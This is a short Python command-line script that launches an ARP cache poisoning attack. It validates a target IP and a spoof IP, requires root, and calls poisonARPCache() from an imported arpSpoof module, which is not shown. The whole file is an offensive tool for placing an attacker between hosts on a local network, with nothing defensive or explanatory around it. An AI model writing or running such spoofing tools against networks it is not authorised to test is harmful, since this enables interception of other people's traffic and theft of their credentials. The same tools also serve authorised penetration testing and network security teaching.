#!/usr/bin/python3
import optparse
import os
from scapy.all import *
from arpSpoof import arpSpoof
import re
import sys

def isValidIP(ip):
    ipRegex = r'^(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])){3}$'
    if re.match(ipRegex, ip):
        return True
    else:
        return False
                     
parser = optparse.OptionParser()
parser.add_option("-t","--targetIP",dest="targetIP",help="Target IP address")
parser.add_option("-s","--spoofIP",dest="spoofIP", help="Spoof IP address")

(option, args) = parser.parse_args()

if option.targetIP != None and option.spoofIP != None:

    if isValidIP(option.targetIP) and isValidIP(option.spoofIP):

        if os.getuid() == 0:
            spoof = arpSpoof(option.targetIP, option.spoofIP)
            spoof.poisonARPCache()

        else:
            print("\n[+] You don't have enough permission to run this script")
    else:
        print("\n[-] Please check the IP addresses again.")

else:
    print(f"\n[+] Usege: {sys.argv[0]} -t targetIP -s spoofIP\n")
    parser.print_help()
